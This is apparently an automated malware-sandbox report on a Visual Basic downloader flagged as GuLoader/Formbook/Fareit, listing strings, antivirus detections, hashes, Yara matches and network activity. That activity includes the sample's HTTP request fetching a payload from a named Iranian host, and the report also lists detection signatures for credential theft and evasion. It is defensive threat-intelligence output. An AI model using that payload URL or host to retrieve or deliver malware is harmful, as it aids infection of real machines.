Bottomlessly
Deathcup
CROSSABILITY
kawaka
VISERENDE
Uanvendeliges
BRUGERANGIVNE
OLDFRUER
facsim
Eftergrelse3
VBA6.DLL
__vbaFpR8
__vbaVarMove
__vbaUI1Str
__vbaVarDup
__vbaFreeObjList
__vbaFreeObj
__vbaStrVarMove
__vbaFreeVarList
__vbaVarTstEq
__vbaFreeStr
__vbaStrCopy
__vbaUI1I2
__vbaCastObjVar
__vbaObjSet
__vbaHresultCheckObj
__vbaNew2
__vbaVarLateMemCallLd
__vbaFreeVar
__vbaFreeStrList
__vbaStrCat
__vbaStrMove
__vbaStrCmp
Kystklima
Volstead5
PHTHIRIUS
Solod
Larvicidal
Foruroligelserne5
UNCONTEMPTIBLY
INSTRUKTIONSKURSUS
Vngerne
Tilhrendes4
Dveskolens8
Servicefunktioners5
EKSEKUTION
Diktere1
CHEFDOM
Lornness7
RANVEIG
Forpligtelseserklrings
metea
Irradiate5
Amuck7
BRANIFF
Bestvlede6
reaccelerated
Oinks
surstyle
sammenstds
refractional
TOTALERS
brdstudiers
Merling8
SATANIZE
DONNER
Driftsikkert6
Plastiskes9
VENSTRELINEAER
Skovhugsterne1
Heautomorphism1
Whoreishly
Bryggerkedels9
tH9=
tj9=
ty9=
@tp9=
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaVarMove
__vbaFreeVar
__vbaStrVarMove
__vbaFreeVarList
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaObjSet
_adj_fdiv_m16i
_adj_fdivr_m16i
__vbaFpR8
_CIsin
__vbaChkstk
EVENT_SINK_AddRef
__vbaStrCmp
__vbaVarTstEq
__vbaCastObjVar
_adj_fpatan
EVENT_SINK_Release
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
_CIlog
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarDup
__vbaVarLateMemCallLd
_CIatan
__vbaStrMove
__vbaUI1Str
_allmul
_CItan
_CIexp
__vbaFreeStr
__vbaFreeObj
%),//,)$
6-*1H
>ABFL
333333334
/ P6pL
L3kOpEkLYZppyTY9i0RZwqFI8r197
Spiralsnoet6
somatological
annelides
Jurata
Sejrvindings
Upshoot3
KOMMUNALBESTYRELSE
aflvningerne
CONTAINMENT
CANCANENS
KATJES
medicean
FLERRIED
OLIGIST
Fodterapeuters
startbogstavs
Caponized9
Blokfljternes
TALVRDIEN
harpist
:20:2
Tuberculomas
Coatninger
Polydaemonist5
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040304B0
LegalCopyright
Internal
LegalTrademarks
Internal
ProductName
Uslebnekrnkel
FileVersion
ProductVersion
InternalName
Tanacetonec7
OriginalFilename
Tanacetonec7.exe
/ P6pL

Full Results

Engine Signature Engine Signature Engine Signature
Bkav Clean MicroWorld-eScan Clean CMC Clean
CAT-QuickHeal Clean ALYac Clean Cylance Unsafe
VIPRE Clean SUPERAntiSpyware Clean Sangfor Malware
K7AntiVirus Clean Alibaba Clean K7GW Clean
Cybereason Clean Arcabit Clean Invincea Clean
Baidu Clean F-Prot W32/VBKrypt.AMM.gen!Eldorado Symantec ML.Attribute.HighConfidence
TotalDefense Clean APEX Malicious Avast Clean
ClamAV Clean Kaspersky Trojan.Win32.Vebzenpak.vsy BitDefender Clean
NANO-Antivirus Clean Paloalto Clean ViRobot Clean
Tencent Clean Ad-Aware Clean Sophos Clean
Comodo Clean F-Secure Clean DrWeb Clean
Zillya Clean TrendMicro Clean McAfee-GW-Edition Clean
Trapmine malicious.high.ml.score FireEye Clean Emsisoft Clean
SentinelOne DFI - Suspicious PE Cyren W32/VBKrypt.AMM.gen!Eldorado Jiangmin Clean
Webroot Clean Avira Clean Fortinet W32/Agent.HKMB!tr
Antiy-AVL Clean Kingsoft Clean Endgame malicious (high confidence)
Microsoft PWS:Win32/Fareit.AB!MTB AegisLab Clean ZoneAlarm Trojan.Win32.Vebzenpak.vsy
Avast-Mobile Clean TACHYON Clean AhnLab-V3 Clean
Acronis Clean McAfee Fareit-FST!5484FDF0FB3F MAX Clean
VBA32 Clean Malwarebytes Trojan.MalPack.VB Zoner Clean
ESET-NOD32 a variant of Win32/Injector.EMGX TrendMicro-HouseCall Clean Rising Downloader.Guloader!1.C738 (CLASSIC)
Yandex Clean Ikarus Win32.SuspectCrc eGambit Unsafe.AI_Score_99%
GData Clean BitDefenderTheta Gen:[email protected] AVG Clean
Panda Clean CrowdStrike Clean Qihoo-360 Generic/HEUR/QVM03.0.B1EC.Malware.Gen
Sorry! No behavior.

Hosts

Direct IP Country Name
N 185.159.153.117 [VT] Iran, Islamic Republic of
Y 1.1.1.1 [VT] Australia

TCP

Source Source Port Destination Destination Port
192.168.1.2 49195 185.159.153.117 pars-science.ir 80
192.168.1.2 49196 185.159.153.117 pars-science.ir 80
192.168.1.2 49197 185.159.153.117 pars-science.ir 80
192.168.1.2 49198 185.159.153.117 pars-science.ir 80

UDP

Source Source Port Destination Destination Port
192.168.1.2 60934 1.1.1.1 53
192.168.1.2 61170 1.1.1.1 53
192.168.1.2 64006 1.1.1.1 53
192.168.1.2 137 192.168.1.255 137
192.168.1.2 137 192.168.1.3 137

DNS

Name Response Post-Analysis Lookup
pars-science.ir [VT] A 185.159.153.117 [VT] 185.159.153.117 [VT]

HTTP Requests

URI Data
http://pars-science.ir/colinx_hYnafiCIIe228.bin
GET /colinx_hYnafiCIIe228.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: pars-science.ir
Cache-Control: no-cache

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

Timestamp Source IP Source Port Destination IP Destination Port Protocol GID SID REV Signature Category Severity
2020-06-05 14:00:27.226 192.168.1.2 [VT] 49183 13.107.42.23 [VT] 443 TCP 1 2028397 2 ET JA3 Hash - Possible Malware - Various Malspam/RigEK Unknown Traffic 3

Suricata TLS

Timestamp Source IP Source Port Destination IP Destination Port Subject Issuer Fingerprint Version
2020-06-05 14:00:27.226 192.168.1.2 [VT] 49183 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2

Suricata HTTP

Timestamp Source IP Source Port Destination IP Destination Port Method Status Hostname URI Content Type User Agent Referrer Length
2020-06-05 14:01:03.173 192.168.1.2 [VT] 49195 185.159.153.117 [VT] 80 None pars-science.ir [VT] /colinx_hYnafiCIIe228.bin None Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko None 0
2020-06-05 14:01:11.252 192.168.1.2 [VT] 49196 185.159.153.117 [VT] 80 None pars-science.ir [VT] /colinx_hYnafiCIIe228.bin None Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko None 0
2020-06-05 14:01:19.985 192.168.1.2 [VT] 49197 185.159.153.117 [VT] 80 None pars-science.ir [VT] /colinx_hYnafiCIIe228.bin None Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko None 0
2020-06-05 14:01:31.201 192.168.1.2 [VT] 49198 185.159.153.117 [VT] 80 200 pars-science.ir [VT] /colinx_hYnafiCIIe228.bin application/octet-stream Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko None 183360
Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.1.2 49183 13.107.42.23 443 3b483d0b34894548b602e8d18cdc24c5 unknown
Sorry! No dropped files.
Sorry! No CAPE files.
Process Name c6Dqqn8fjGAx.exe
PID 5848
Dump Size 182784 bytes
Module Path C:\Users\Rebecca\AppData\Local\Temp\c6Dqqn8fjGAx.exe
Type PE image: 32-bit executable
PE timestamp 2014-02-06 00:19:06
MD5 fa2910caca0aad77640eefc700c1c1bf
SHA1 518f430145b9f5ee728f882f6ab04c546d5e8629
SHA256 21b58278848b50881a20a01a8a807a5adc3708b1225ed05267ef6bcace25d4bf
CRC32 F6C4D501
Ssdeep 3072:y8X8KOYTUts7Ek7+4kETDufRzSJn8+Mxo8jDyt7MyNJhPoz6wtWxwSD1MYa:ypc5EE+pyozSJn8+KoSDyWOhPonSDaT
Yara
  • shellcode_get_eip - Match x86 that appears to fetch $PC. - Author: William Ballenthin
  • shellcode_stack_strings - Match x86 that appears to be stack string creation. - Author: William Ballenthin
CAPE Yara
  • Formbook Payload - Author: Felix Bilstein - yara-signator at cocacoding dot com
Dump Filename 21b58278848b50881a20a01a8a807a5adc3708b1225ed05267ef6bcace25d4bf
Download Download Zip

BinGraph Download graph

Defense Evasion Privilege Escalation
  • T1116 - Code Signing
    • Signature - invalid_authenticode_signature
  • T1055 - Process Injection
    • Signature - InjectionInterProcess
  • T1055 - Process Injection
    • Signature - InjectionInterProcess

    Processing ( 8.553999999999998 seconds )

    • 5.237 Suricata
    • 2.177 NetworkAnalysis
    • 0.513 CAPE
    • 0.189 VirusTotal
    • 0.182 BehaviorAnalysis
    • 0.162 Static
    • 0.03 Deduplicate
    • 0.019 AnalysisInfo
    • 0.018 ProcDump
    • 0.011 TargetInfo
    • 0.006 Debug
    • 0.004 Dropped
    • 0.004 peid
    • 0.002 Strings

    Signatures ( 0.21600000000000008 seconds )

    • 0.046 antiav_detectreg
    • 0.017 infostealer_ftp
    • 0.016 territorial_disputes_sigs
    • 0.012 ransomware_files
    • 0.01 infostealer_im
    • 0.009 antianalysis_detectreg
    • 0.007 ransomware_extensions
    • 0.006 antiav_detectfile
    • 0.005 antidbg_windows
    • 0.005 persistence_autorun
    • 0.005 antivm_vbox_keys
    • 0.005 modify_proxy
    • 0.004 api_spamming
    • 0.004 decoy_document
    • 0.004 antianalysis_detectfile
    • 0.004 infostealer_bitcoin
    • 0.004 infostealer_mail
    • 0.003 NewtWire Behavior
    • 0.003 antivm_vmware_keys
    • 0.003 masquerade_process_name
    • 0.002 antivm_generic_disk
    • 0.002 kibex_behavior
    • 0.002 antivm_parallels_keys
    • 0.002 antivm_vbox_files
    • 0.002 antivm_xen_keys
    • 0.002 geodo_banking_trojan
    • 0.002 browser_security
    • 0.002 disables_browser_warn
    • 0.002 network_torgateway
    • 0.001 Doppelganging
    • 0.001 InjectionCreateRemoteThread
    • 0.001 antiemu_wine_func
    • 0.001 antivm_generic_scsi
    • 0.001 antivm_vbox_libs
    • 0.001 betabot_behavior
    • 0.001 bootkit
    • 0.001 dynamic_function_loading
    • 0.001 exec_crash
    • 0.001 injection_createremotethread
    • 0.001 malicious_dynamic_function_loading
    • 0.001 mimics_filetime
    • 0.001 reads_self
    • 0.001 stealth_file
    • 0.001 stealth_timeout
    • 0.001 tinba_behavior
    • 0.001 virus
    • 0.001 antidbg_devices
    • 0.001 antivm_generic_diskreg
    • 0.001 antivm_vpc_keys
    • 0.001 ketrican_regkeys
    • 0.001 network_cnc_http
    • 0.001 network_dns_opennic
    • 0.001 revil_mutexes
    • 0.001 limerat_regkeys
    • 0.001 recon_fingerprint

    Reporting ( 7.823 seconds )

    • 7.76 BinGraph
    • 0.049 MITRE_TTPS
    • 0.014 PCAP2CERT